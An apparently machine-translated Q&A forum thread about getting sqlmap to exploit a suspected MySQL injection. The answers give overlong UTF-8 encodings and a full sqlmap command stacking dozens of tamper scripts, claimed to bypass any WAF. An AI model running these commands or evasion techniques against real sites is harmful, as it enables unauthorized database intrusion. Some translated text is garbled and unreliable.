Iniezione speciale per sqlmap

2

Attualmente sto ripetendo il sito web dei miei amici. Ho trovato un'iniezione SQL con l'aiuto di acunetix:

- URL encoded GET input for was set to 1#####
Error message found: 
supplied argument is not a valid MySQL result

Quindi ho provato a eseguire una normale sqlmap:

./sqlmap.py -u "http://www.example.com/ajax.php?div=content&for=1*&page=1&sort=4&show=1&what=topic" --threads=25

Output:

[11:16:31] [WARNING] URI parameter '#1*' is not injectable [11:16:31] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp'). If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')

Quindi ho bisogno di un modo per includere il% co_de di quei # Provato (for=1%00%c0%a7%c0%a2) e --string ma non ha fatto il lavoro. Forse c'è una manomissione per questo?

    
posta nickvl 04.09.2016 - 19:17
fonte

2 risposte

1

Questi caratteri sono Overlong-UTF8: '=% 27 =% c0% a7 =% e0% 80% a7 =% f0% 80% 80% a7 "=% 22 =% c0% a2 =% e0% 80% a2 =% f0% 80% 80% a2 < =% 3c =% c0% bc =% e0% 80% bc =% f0% 80% 80% bc ; =% 3b =% c0% bb =% e0% 80% bb =% f0% 80% 80% bb & =% 26 =% c0% a6 =% e0% 80% a6 =% f0% 80% 80% a6 \ 0 =% 00 =% c0% 80 =% e0% 80% 80 =% f0% 80% 80% 80

Se si utilizza SQLMAP è possibile utilizzare --tamper = overlongutf8 per sfruttare la vulnerabilità.

    
risposta data 05.01.2017 - 02:13
fonte
1

C'è un altro modo in cui è possibile utilizzare tutti i tamper in una riga in questo modo:

./sqlmap.py -u "http://www.example.com/ajax.php?div=content&for=1*&page=1&sort=4&show=1&what=topic" --threads=25 --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords

Usando questo, puoi passare sopra tutti i WAF.

    
risposta data 22.02.2017 - 17:02
fonte

Leggi altre domande sui tag